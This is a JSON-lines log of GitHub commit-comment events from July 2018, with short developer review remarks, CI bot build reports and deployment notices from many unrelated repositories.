{"id":"7997357969","type":"CommitCommentEvent","actor":{"login":"YanayRosen"},"repo":{"name":"broadinstitute/single_cell_portal_core"},"payload":{"comment":{"id":29785188,"position":null,"line":null,"path":null,"commit_id":"e3d386fc57d03962a0bafb357cae5948eab2dedc","created_at":"2018-07-20T21:51:19Z","updated_at":"2018-07-20T21:51:19Z","author_association":"COLLABORATOR","body":"Initial split clusters commit"}},"created_at":"2018-07-20T21:51:19Z"}
{"id":"7997359848","type":"CommitCommentEvent","actor":{"login":"pv"},"repo":{"name":"MacPython/numpy-wheels"},"payload":{"comment":{"id":29785192,"position":null,"line":null,"path":null,"commit_id":"cd530708178788aa3f6edb2df4acbc1daf29af69","created_at":"2018-07-20T21:51:54Z","updated_at":"2018-07-20T21:51:54Z","author_association":"NONE","body":"Not sure about this, but heads up that this change might be (or, might not be) related to some test failures seen in Scipy:\r\nhttps://github.com/scipy/scipy/issues/9063"}},"created_at":"2018-07-20T21:51:54Z"}
{"id":"7997360925","type":"CommitCommentEvent","actor":{"login":"karthiknadig"},"repo":{"name":"karthiknadig/ptvsd"},"payload":{"comment":{"id":29785195,"position":null,"line":null,"path":null,"commit_id":"93ec1f99b54e073b5906691d9989ff49400b5aae","created_at":"2018-07-20T21:52:15Z","updated_at":"2018-07-20T21:52:15Z","author_association":"OWNER","body":"WaitOnNormalExit and WaitOnAbnormalExit flags. These are checked in `_wait_options()`, which returns the flag state only for launch and for attach it is always false."}},"created_at":"2018-07-20T21:52:15Z"}
{"id":"7997361936","type":"CommitCommentEvent","actor":{"login":"remexre"},"repo":{"name":"acmumn/website"},"payload":{"comment":{"id":29785198,"position":null,"line":null,"path":null,"commit_id":"539bff7f6fdb8087a5a905a689f14f7f0257ce2a","created_at":"2018-07-20T21:52:33Z","updated_at":"2018-07-20T21:52:33Z","author_association":"CONTRIBUTOR","body":"..."}},"created_at":"2018-07-20T21:52:33Z"}
{"id":"7997367272","type":"CommitCommentEvent","actor":{"login":"iptq"},"repo":{"name":"acmumn/website"},"payload":{"comment":{"id":29785207,"position":null,"line":null,"path":null,"commit_id":"539bff7f6fdb8087a5a905a689f14f7f0257ce2a","created_at":"2018-07-20T21:54:14Z","updated_at":"2018-07-20T21:54:14Z","author_association":"CONTRIBUTOR","body":"i think ur commit script fucked up"}},"created_at":"2018-07-20T21:54:14Z"}
{"id":"7997373670","type":"CommitCommentEvent","actor":{"login":"gmltA"},"repo":{"name":"MikhailSkirukha/bsuirfind"},"payload":{"comment":{"id":29785222,"position":4,"line":96,"path":"BsuirFind.Foundation/Services/TeamService.cs","commit_id":"d62b26b06b189c690c7544c2365b130d9bfad6d6","created_at":"2018-07-20T21:56:13Z","updated_at":"2018-07-20T21:56:13Z","author_association":"COLLABORATOR","body":"Now we are missing user check at all =)"}},"created_at":"2018-07-20T21:56:13Z"}
{"id":"7997374764","type":"CommitCommentEvent","actor":{"login":"jacob-alford"},"repo":{"name":"jacob-alford/jBot"},"payload":{"comment":{"id":29785224,"position":595,"line":777,"path":"index.js","commit_id":"386f46d5de6a5a33cf1051fd9d7eb58e0381d301","created_at":"2018-07-20T21:56:34Z","updated_at":"2018-07-20T21:56:34Z","author_association":"OWNER","body":"Woops!  I've changed it, don't worry :-)"}},"created_at":"2018-07-20T21:56:34Z"}
{"id":"7997380455","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29785240,"position":18,"line":22,"path":"BankManagement/BankManagement/Bank.c","commit_id":"d8ca4fb8c158cb581f5a6ff2bd6b50c998a95f67","created_at":"2018-07-20T21:58:12Z","updated_at":"2018-07-20T21:58:12Z","author_association":"NONE","body":"remove"}},"created_at":"2018-07-20T21:58:12Z"}
{"id":"7997381862","type":"CommitCommentEvent","actor":{"login":"Vimalraveendra"},"repo":{"name":"Vimalraveendra/shoppingList"},"payload":{"comment":{"id":29785248,"position":null,"line":null,"path":null,"commit_id":"4333193c53d58e8608baa1c97c3378cc5a26095d","created_at":"2018-07-20T21:58:38Z","updated_at":"2018-07-20T21:58:38Z","author_association":"OWNER","body":"Solution to the shopping List https://codepen.io/Vimalraveendra/full/GBrrRa"}},"created_at":"2018-07-20T21:58:38Z"}
{"id":"7997382245","type":"CommitCommentEvent","actor":{"login":"seananderson"},"repo":{"name":"pbs-assess/gfplot"},"payload":{"comment":{"id":29785250,"position":null,"line":null,"path":null,"commit_id":"8bb92423ddd7d4d85869e4781225ea3debfcc524","created_at":"2018-07-20T21:58:47Z","updated_at":"2018-07-20T21:58:47Z","author_association":"MEMBER","body":"Do we not need these data? This is causing the error in https://github.com/pbs-assess/gfsynopsis/issues/31 because the sex column no longer exists."}},"created_at":"2018-07-20T21:58:47Z"}
{"id":"7997385664","type":"CommitCommentEvent","actor":{"login":"elisim"},"repo":{"name":"talsim/Bank-Management"},"payload":{"comment":{"id":29785260,"position":8,"line":20,"path":"BankManagement/BankManagement/bankAPI.h","commit_id":"d8ca4fb8c158cb581f5a6ff2bd6b50c998a95f67","created_at":"2018-07-20T21:59:48Z","updated_at":"2018-07-20T21:59:48Z","author_association":"NONE","body":"why? so everyone that will use your bank function will see read_line and read_int?\r\nThis functions are not a part of bank API "}},"created_at":"2018-07-20T21:59:48Z"}
{"id":"7997386040","type":"CommitCommentEvent","actor":{"login":"Giulio2002"},"repo":{"name":"TinyCaliber/SharpEdges"},"payload":{"comment":{"id":29785261,"position":null,"line":null,"path":null,"commit_id":"ebb69e6548d6f2a41b930d4d08df4706ca14d539","created_at":"2018-07-20T21:59:55Z","updated_at":"2018-07-20T21:59:55Z","author_association":"NONE","body":"i suggest you add an head tag before your body tag and to put every metadata in it"}},"created_at":"2018-07-20T21:59:55Z"}
{"id":"7997387976","type":"CommitCommentEvent","actor":{"login":"setcode"},"repo":{"name":"setcode/airstereo"},"payload":{"comment":{"id":29785274,"position":null,"line":null,"path":null,"commit_id":"405088e203d83e64fac3aef34c29403513802f4e","created_at":"2018-07-20T22:00:26Z","updated_at":"2018-07-20T22:00:26Z","author_association":"OWNER","body":"Functioning..."}},"created_at":"2018-07-20T22:00:26Z"}
{"id":"7997389206","type":"CommitCommentEvent","actor":{"login":"b606"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29785278,"position":null,"line":null,"path":null,"commit_id":"52d23aa185e34783d79d8d2e5d4f0b7255bc9305","created_at":"2018-07-20T22:00:47Z","updated_at":"2018-07-20T22:00:47Z","author_association":"CONTRIBUTOR","body":"pack animals : bêtes de somme [https://fr.wikipedia.org/wiki/Bête_de_somme](https://fr.wikipedia.org/wiki/B%C3%AAte_de_somme)\r\n\r\nLower> : à mon sens, c'est en minuscule comme l'anglais.\r\n"}},"created_at":"2018-07-20T22:00:47Z"}
{"id":"7997392908","type":"CommitCommentEvent","actor":{"login":"DirtyF"},"repo":{"name":"regisphilibert/rp_hugo"},"payload":{"comment":{"id":29785288,"position":197,"line":197,"path":"content/post/hugo-pipes/index.md","commit_id":"b035564d253ce058b4de76cd716399c37022cc0c","created_at":"2018-07-20T22:01:53Z","updated_at":"2018-07-20T22:01:53Z","author_association":"COLLABORATOR","body":"above it was `defaultJS`"}},"created_at":"2018-07-20T22:01:53Z"}
{"id":"7997394152","type":"CommitCommentEvent","actor":{"login":"DirtyF"},"repo":{"name":"regisphilibert/rp_hugo"},"payload":{"comment":{"id":29785294,"position":199,"line":199,"path":"content/post/hugo-pipes/index.md","commit_id":"b035564d253ce058b4de76cd716399c37022cc0c","created_at":"2018-07-20T22:02:16Z","updated_at":"2018-07-20T22:02:16Z","author_association":"COLLABORATOR","body":"same here above it's `$homeJS`"}},"created_at":"2018-07-20T22:02:16Z"}
{"id":"7997395271","type":"CommitCommentEvent","actor":{"login":"elisekeppel"},"repo":{"name":"pbs-assess/gfplot"},"payload":{"comment":{"id":29785297,"position":null,"line":null,"path":null,"commit_id":"8bb92423ddd7d4d85869e4781225ea3debfcc524","created_at":"2018-07-20T22:02:38Z","updated_at":"2018-07-20T22:02:38Z","author_association":"COLLABORATOR","body":"You can undo my commit.. I did not intentionally remove sex. I was just trying to widdle down the maturity labels and must have accidentally done so. "}},"created_at":"2018-07-20T22:02:38Z"}
{"id":"7997401977","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29785318,"position":null,"line":null,"path":null,"commit_id":"3e1e6d6805d5a654c22f15c3ba85039ea0c29100","created_at":"2018-07-20T22:04:50Z","updated_at":"2018-07-20T22:04:50Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [allenfearp](https://allenfearp-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/professional-services](https://allenfearp-static-docs.pantheonsite.io/docs/professional-services)\n"}},"created_at":"2018-07-20T22:04:50Z"}
{"id":"7997405339","type":"CommitCommentEvent","actor":{"login":"xXFISHERXx"},"repo":{"name":"majomaken/housegamingproyect"},"payload":{"comment":{"id":29785323,"position":null,"line":null,"path":null,"commit_id":"11c784b16d694fa29a9daec96a6259e9e98457a9","created_at":"2018-07-20T22:05:54Z","updated_at":"2018-07-20T22:05:54Z","author_association":"COLLABORATOR","body":"Listo"}},"created_at":"2018-07-20T22:05:54Z"}
{"id":"7997407799","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29785327,"position":null,"line":null,"path":null,"commit_id":"f17ac477f371a462d74c4a699e9cd4e243a5c3cf","created_at":"2018-07-20T22:06:43Z","updated_at":"2018-07-20T22:06:43Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-887](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-887).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-887-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T22:06:43Z"}
{"id":"7997410888","type":"CommitCommentEvent","actor":{"login":"ssassassa"},"repo":{"name":"SpaceGroupUCL/qgisSpaceSyntaxToolkit"},"payload":{"comment":{"id":29785333,"position":null,"line":null,"path":null,"commit_id":"98768245b40c0d88581efa38fd57120ecc80871b","created_at":"2018-07-20T22:07:45Z","updated_at":"2018-07-20T22:07:45Z","author_association":"NONE","body":"please how  download space syntax\r\n"}},"created_at":"2018-07-20T22:07:45Z"}
{"id":"7997416207","type":"CommitCommentEvent","actor":{"login":"joshi1983"},"repo":{"name":"hhaccessibility/hhaccessibility.github.io"},"payload":{"comment":{"id":29785355,"position":29,"line":48,"path":"app/app/Http/Controllers/PasswordRecoveryController.php","commit_id":"7a64a485717759b02ad77e058774c5b91c2d65f0","created_at":"2018-07-20T22:09:32Z","updated_at":"2018-07-20T22:09:32Z","author_association":"COLLABORATOR","body":"Was it a mistake to keep your email address there, @passionInfinite ?\r\n\r\nI properly receive the email but why did you hardcode your email address here?  If it is related to how you tie the gmail email service to an email account that we have credentials for, it should come from the .env file."}},"created_at":"2018-07-20T22:09:32Z"}
{"id":"7997416281","type":"CommitCommentEvent","actor":{"login":"tylerburleigh"},"repo":{"name":"tylerburleigh/expfactory"},"payload":{"comment":{"id":29785356,"position":null,"line":null,"path":null,"commit_id":"32287f75041a39ce7c4282731b2285650a95b41c","created_at":"2018-07-20T22:09:34Z","updated_at":"2018-07-20T22:09:34Z","author_association":"OWNER","body":"If an external URL is set as a URL parameter, then once the task is finished expfactory will send the user there.\r\n\r\nFor example...\r\n```\r\nhttps://myexpfactory/login?goto_external=https://google.com\r\n```\r\n\r\nThis will send the user to `https://google.com` once the task is finished."}},"created_at":"2018-07-20T22:09:34Z"}
{"id":"7997416411","type":"CommitCommentEvent","actor":{"login":"reitermarkus"},"repo":{"name":"Homebrew/brew"},"payload":{"comment":{"id":29785357,"position":null,"line":null,"path":null,"commit_id":"589c5b4e8dc4fab625868672d138e46290b19ecf","created_at":"2018-07-20T22:09:37Z","updated_at":"2018-07-20T22:09:37Z","author_association":"MEMBER","body":"Fixed in https://github.com/Homebrew/brew/pull/4524."}},"created_at":"2018-07-20T22:09:37Z"}
{"id":"7997417868","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29785364,"position":null,"line":null,"path":null,"commit_id":"172f7521937dddb366d16cffdaed7cd55e6970e2","created_at":"2018-07-20T22:10:05Z","updated_at":"2018-07-20T22:10:05Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2322 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.2%25-green.png)</a>\n"}},"created_at":"2018-07-20T22:10:05Z"}
{"id":"7997418094","type":"CommitCommentEvent","actor":{"login":"marclaporte"},"repo":{"name":"WikiSuite/openfire"},"payload":{"comment":{"id":29785365,"position":null,"line":null,"path":null,"commit_id":"55bceae81d42646983a159dfbf08af121a102fb8","created_at":"2018-07-20T22:10:10Z","updated_at":"2018-07-20T22:10:10Z","author_association":"MEMBER","body":"Build system needs a little nudge?\r\nhttp://koji.clearos.com/koji/packageinfo?packageID=302"}},"created_at":"2018-07-20T22:10:10Z"}
{"id":"7997420564","type":"CommitCommentEvent","actor":{"login":"ironmig"},"repo":{"name":"ros-simulation/gazebo_ros_pkgs"},"payload":{"comment":{"id":29785368,"position":112,"line":93,"path":"gazebo_ros/test/test_plugins.cpp","commit_id":"d34452a733d3f88fb788f6bbc21289b2cb575a89","created_at":"2018-07-20T22:10:58Z","updated_at":"2018-07-20T22:10:58Z","author_association":"COLLABORATOR","body":"Isn't is possible that we just receive multiple messages from 1 topic, not one from each topic? I believe the test would pass in this case"}},"created_at":"2018-07-20T22:10:58Z"}
{"id":"7997422273","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29785373,"position":null,"line":null,"path":null,"commit_id":"172f7521937dddb366d16cffdaed7cd55e6970e2","created_at":"2018-07-20T22:11:31Z","updated_at":"2018-07-20T22:11:31Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (rraustad) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a>  \n"}},"created_at":"2018-07-20T22:11:31Z"}
{"id":"7997429283","type":"CommitCommentEvent","actor":{"login":"oddluck"},"repo":{"name":"oddluck/idlerpg-themable"},"payload":{"comment":{"id":29785391,"position":null,"line":null,"path":null,"commit_id":"2493b56ab7cf20bc507d73e855963884f4c36924","created_at":"2018-07-20T22:13:52Z","updated_at":"2018-07-20T22:13:52Z","author_association":"OWNER","body":"de-voice when users not logged in automatically on bot start/restart"}},"created_at":"2018-07-20T22:13:52Z"}
{"id":"7997438278","type":"CommitCommentEvent","actor":{"login":"firebird11"},"repo":{"name":"crdroidandroid/android_packages_fonts_crDroidFonts"},"payload":{"comment":{"id":29785411,"position":null,"line":null,"path":null,"commit_id":"67c6ec9810b6312fd77017a3cd8c65c22db02ffc","created_at":"2018-07-20T22:16:49Z","updated_at":"2018-07-20T22:16:49Z","author_association":"MEMBER","body":"Wew\n"}},"created_at":"2018-07-20T22:16:49Z"}
{"id":"7997439001","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29785412,"position":null,"line":null,"path":null,"commit_id":"9de291a05c3e50682536a6f31787c5238097b66b","created_at":"2018-07-20T22:17:05Z","updated_at":"2018-07-20T22:17:05Z","author_association":"NONE","body":"hot"}},"created_at":"2018-07-20T22:17:05Z"}
{"id":"7997440925","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29785417,"position":null,"line":null,"path":null,"commit_id":"9de291a05c3e50682536a6f31787c5238097b66b","created_at":"2018-07-20T22:17:45Z","updated_at":"2018-07-20T22:17:45Z","author_association":"CONTRIBUTOR","body":"### _**ABSOLUTE UNIT**_"}},"created_at":"2018-07-20T22:17:45Z"}
{"id":"7997445308","type":"CommitCommentEvent","actor":{"login":"faherrera"},"repo":{"name":"LeonidasEsteban/platzi-video-router-preview"},"payload":{"comment":{"id":29785426,"position":null,"line":null,"path":null,"commit_id":"5a0c4c11d8f4822dec5fc42bd8391c73a37bc4d5","created_at":"2018-07-20T22:19:17Z","updated_at":"2018-07-20T22:19:17Z","author_association":"NONE","body":"Spoiler alert!"}},"created_at":"2018-07-20T22:19:17Z"}
{"id":"7997447447","type":"CommitCommentEvent","actor":{"login":"gopherci[bot]"},"repo":{"name":"DiSiqueira/UltraSlackBot"},"payload":{"comment":{"id":29785438,"position":null,"line":null,"path":null,"commit_id":"6a45b7df3be61b467bc54e55c801946cd038e46d","created_at":"2018-07-20T22:20:05Z","updated_at":"2018-07-20T22:20:05Z","author_association":"NONE","body":"GopherCI found **49** issues in the last **6** commits, see: https://gci.gopherci.io/analysis/1589"}},"created_at":"2018-07-20T22:20:05Z"}
{"id":"7997448999","type":"CommitCommentEvent","actor":{"login":"KnifuWaifu"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29785439,"position":null,"line":null,"path":null,"commit_id":"9de291a05c3e50682536a6f31787c5238097b66b","created_at":"2018-07-20T22:20:32Z","updated_at":"2018-07-20T22:20:32Z","author_association":"NONE","body":"uwu"}},"created_at":"2018-07-20T22:20:32Z"}
{"id":"7997450693","type":"CommitCommentEvent","actor":{"login":"Shana6"},"repo":{"name":"MonikaDiscord/Monika"},"payload":{"comment":{"id":29785444,"position":null,"line":null,"path":null,"commit_id":"9de291a05c3e50682536a6f31787c5238097b66b","created_at":"2018-07-20T22:21:02Z","updated_at":"2018-07-20T22:21:02Z","author_association":"CONTRIBUTOR","body":"wuw\r\n"}},"created_at":"2018-07-20T22:21:02Z"}
{"id":"7997459051","type":"CommitCommentEvent","actor":{"login":"Rainrider"},"repo":{"name":"xmyno/oUF_Drk"},"payload":{"comment":{"id":29785465,"position":5,"line":222,"path":"units/player.lua","commit_id":"02d92ed94992242d03c0721b32a596957a4bef77","created_at":"2018-07-20T22:23:58Z","updated_at":"2018-07-20T22:23:58Z","author_association":"NONE","body":"Sorry for chiming in, but you'd better leave this to the element (I mean the added part only). The reason is that this code will only be rarely evaluated (on PLAYER_ENTERING_WORLD I think) and it won't catch the case where the user gets the Heart of Azeroth."}},"created_at":"2018-07-20T22:23:58Z"}
{"id":"7997459291","type":"CommitCommentEvent","actor":{"login":"passionInfinite"},"repo":{"name":"hhaccessibility/hhaccessibility.github.io"},"payload":{"comment":{"id":29785466,"position":29,"line":48,"path":"app/app/Http/Controllers/PasswordRecoveryController.php","commit_id":"7a64a485717759b02ad77e058774c5b91c2d65f0","created_at":"2018-07-20T22:24:02Z","updated_at":"2018-07-20T22:24:02Z","author_association":"COLLABORATOR","body":"Yes, I guess it was a mistake that I made during development on my local\nenvironment.\n\nOn Fri, Jul 20, 2018, 6:09 PM Josh Greig, <notifications@github.com> wrote:\n\n> Was it a mistake to keep your email address there, @passionInfinite\n> <https://github.com/passionInfinite> ?\n>\n> I properly receive the email but why did you hardcode your email address\n> here? If it is related to how you tie the gmail email service to an email\n> account that we have credentials for, it should come from the .env file.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/hhaccessibility/hhaccessibility.github.io/commit/7a64a485717759b02ad77e058774c5b91c2d65f0#commitcomment-29785355>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AQFIhsYp3vLJf5shftWu01SEYi4gH4Ojks5uIlUdgaJpZM4VZVPi>\n> .\n>\n"}},"created_at":"2018-07-20T22:24:02Z"}
{"id":"7997475570","type":"CommitCommentEvent","actor":{"login":"libraryaddict"},"repo":{"name":"BlueSoapTurtle/LibsDisguises"},"payload":{"comment":{"id":29785511,"position":12,"line":601,"path":"src/me/libraryaddict/disguise/utilities/DisguiseParser.java","commit_id":"c71d8070665ddf9bdeeb140560984196519deb17","created_at":"2018-07-20T22:29:52Z","updated_at":"2018-07-20T22:29:52Z","author_association":"NONE","body":"Can you separate this line and the above closing } line with a newline"}},"created_at":"2018-07-20T22:29:52Z"}
{"id":"7997478013","type":"CommitCommentEvent","actor":{"login":"firebird11"},"repo":{"name":"crdroidandroid/android_vendor_crDroidOTA"},"payload":{"comment":{"id":29785526,"position":null,"line":null,"path":null,"commit_id":"9adb37448cef176fbaceb6dbe22ec3da7c055ec3","created_at":"2018-07-20T22:30:44Z","updated_at":"2018-07-20T22:30:44Z","author_association":"MEMBER","body":"Why did you change download location ?\nIt has to stay on our afh"}},"created_at":"2018-07-20T22:30:44Z"}
{"id":"7997479750","type":"CommitCommentEvent","actor":{"login":"KillTheMule"},"repo":{"name":"KillTheMule/neovim"},"payload":{"comment":{"id":29785532,"position":58,"line":76,"path":"runtime/lua/tycho/init.lua","commit_id":"92cd1930bb9b023f15de263c2d6155f8903999b4","created_at":"2018-07-20T22:31:20Z","updated_at":"2018-07-20T22:31:20Z","author_association":"OWNER","body":"Hahaha yeah of course, didn't matter in this instance, but would have made some fun bugs :) Thanks!"}},"created_at":"2018-07-20T22:31:20Z"}
{"id":"7997483155","type":"CommitCommentEvent","actor":{"login":"TudorGruian"},"repo":{"name":"Rapptz/discord.py"},"payload":{"comment":{"id":29785540,"position":null,"line":null,"path":null,"commit_id":"1863a1c6636f53592519320a173ec9573c090c0b","created_at":"2018-07-20T22:32:34Z","updated_at":"2018-07-20T22:32:34Z","author_association":"NONE","body":"Thanks! It works.But please change compat.py on stable version (the one on pip)"}},"created_at":"2018-07-20T22:32:34Z"}
{"id":"7997489811","type":"CommitCommentEvent","actor":{"login":"chapulina"},"repo":{"name":"ros-simulation/gazebo_ros_pkgs"},"payload":{"comment":{"id":29785555,"position":112,"line":93,"path":"gazebo_ros/test/test_plugins.cpp","commit_id":"d34452a733d3f88fb788f6bbc21289b2cb575a89","created_at":"2018-07-20T22:35:07Z","updated_at":"2018-07-20T22:35:07Z","author_association":"NONE","body":"Great point, let me address it."}},"created_at":"2018-07-20T22:35:07Z"}
{"id":"7997493380","type":"CommitCommentEvent","actor":{"login":"ironmig"},"repo":{"name":"ros-simulation/gazebo_ros_pkgs"},"payload":{"comment":{"id":29785569,"position":112,"line":93,"path":"gazebo_ros/test/test_plugins.cpp","commit_id":"d34452a733d3f88fb788f6bbc21289b2cb575a89","created_at":"2018-07-20T22:36:26Z","updated_at":"2018-07-20T22:36:26Z","author_association":"COLLABORATOR","body":"I think I fixed it when merging the changes in  https://github.com/ros-simulation/gazebo_ros_pkgs/pull/771/commits/d5e448bd61a414197b4563ef8075105f852a22d7"}},"created_at":"2018-07-20T22:36:26Z"}
{"id":"7997494186","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29785571,"position":null,"line":null,"path":null,"commit_id":"3aef508b23760a3ee41256c928e249fb4b68f421","created_at":"2018-07-20T22:36:46Z","updated_at":"2018-07-20T22:36:46Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-888](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-888).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-888-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T22:36:46Z"}
{"id":"7997495649","type":"CommitCommentEvent","actor":{"login":"ForserX"},"repo":{"name":"xrOxygen/xray-oxygen"},"payload":{"comment":{"id":29785576,"position":7,"line":7,"path":"code/engine.vc2008/xrGame/CMagazine.cpp","commit_id":"040d7103adb281ba4cf58373c0d3c1d1b5370493","created_at":"2018-07-20T22:37:18Z","updated_at":"2018-07-20T22:37:18Z","author_association":"MEMBER","body":"Зануляй в конструкторе..."}},"created_at":"2018-07-20T22:37:18Z"}
{"id":"7997497923","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29785581,"position":null,"line":null,"path":null,"commit_id":"142f0134fa5a8be886e37954a7bca8c7a9db2d3a","created_at":"2018-07-20T22:38:10Z","updated_at":"2018-07-20T22:38:10Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [customcert](https://customcert-static-docs.pantheonsite.io/docs) Multidev environment:\n- [/docs/custom-certificates](https://customcert-static-docs.pantheonsite.io/docs/custom-certificates)\n"}},"created_at":"2018-07-20T22:38:10Z"}
{"id":"7997501641","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/SucreCloud"},"payload":{"comment":{"id":29785586,"position":135,"line":278,"path":"src/App/components/explorer/DirectoryList.jsx","commit_id":"63e552c268cf788e0afb322d8062432ff9a7d408","created_at":"2018-07-20T22:39:38Z","updated_at":"2018-07-20T22:39:38Z","author_association":"OWNER","body":"para descargar se pasa el item, en vez de la rruta "}},"created_at":"2018-07-20T22:39:38Z"}
{"id":"7997502984","type":"CommitCommentEvent","actor":{"login":"chopeen"},"repo":{"name":"chopeen/last-fm-not-mine-alert-web"},"payload":{"comment":{"id":29785590,"position":null,"line":null,"path":null,"commit_id":"adb5b6608e07f0a937ff75e678fb3ddf1c3bf3a6","created_at":"2018-07-20T22:40:10Z","updated_at":"2018-07-20T22:40:10Z","author_association":"OWNER","body":"The commit comment is wrong - `robots.txt` was **NOT** getting deployed when placed it `/Pages`."}},"created_at":"2018-07-20T22:40:10Z"}
{"id":"7997507401","type":"CommitCommentEvent","actor":{"login":"Xaratas"},"repo":{"name":"Xaratas/pillarsofeternity-2-german-patch"},"payload":{"comment":{"id":29785604,"position":null,"line":null,"path":null,"commit_id":"d71c9fb4c5e66defaa345a1491679bef9f5cc163","created_at":"2018-07-20T22:41:52Z","updated_at":"2018-07-20T22:41:52Z","author_association":"OWNER","body":"Explodieren ist immer nach außen ;)"}},"created_at":"2018-07-20T22:41:52Z"}
{"id":"7997509069","type":"CommitCommentEvent","actor":{"login":"haroldekeh"},"repo":{"name":"abhinayar/EveryVoteCounts"},"payload":{"comment":{"id":29785610,"position":null,"line":null,"path":null,"commit_id":"7871ab39a48c556e1f1fc63f09242abceed1c278","created_at":"2018-07-20T22:42:32Z","updated_at":"2018-07-20T22:42:32Z","author_association":"COLLABORATOR","body":"Send"}},"created_at":"2018-07-20T22:42:32Z"}
{"id":"7997509117","type":"CommitCommentEvent","actor":{"login":"Areki-san"},"repo":{"name":"Areki-san/platform_manifest"},"payload":{"comment":{"id":29785611,"position":null,"line":null,"path":null,"commit_id":"7eea026219e3c568173baebbad32345c41443357","created_at":"2018-07-20T22:42:33Z","updated_at":"2018-07-20T22:42:33Z","author_association":"OWNER","body":"перевод на русский"}},"created_at":"2018-07-20T22:42:33Z"}
{"id":"7997509444","type":"CommitCommentEvent","actor":{"login":"nerzhul"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":29785612,"position":null,"line":null,"path":null,"commit_id":"ea86ecf015cd82d2daa4c0f4a82096402290a5a6","created_at":"2018-07-20T22:42:42Z","updated_at":"2018-07-20T22:42:42Z","author_association":"MEMBER","body":"it's correct, and it works well."}},"created_at":"2018-07-20T22:42:42Z"}
{"id":"7997511878","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29785615,"position":null,"line":null,"path":null,"commit_id":"2c3b824e03665f8aa2cb5c4353f027cd138aab21","created_at":"2018-07-20T22:43:40Z","updated_at":"2018-07-20T22:43:40Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-242](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-242).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-242-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-20T22:43:40Z"}
{"id":"7997513855","type":"CommitCommentEvent","actor":{"login":"Davidc2525"},"repo":{"name":"Davidc2525/SucreCloud"},"payload":{"comment":{"id":29785621,"position":14,"line":61,"path":"src/App/components/download_viewer/index.js","commit_id":"63e552c268cf788e0afb322d8062432ff9a7d408","created_at":"2018-07-20T22:44:24Z","updated_at":"2018-07-20T22:44:24Z","author_association":"OWNER","body":"ahora se puede ver la vellosidad de la descarga"}},"created_at":"2018-07-20T22:44:24Z"}
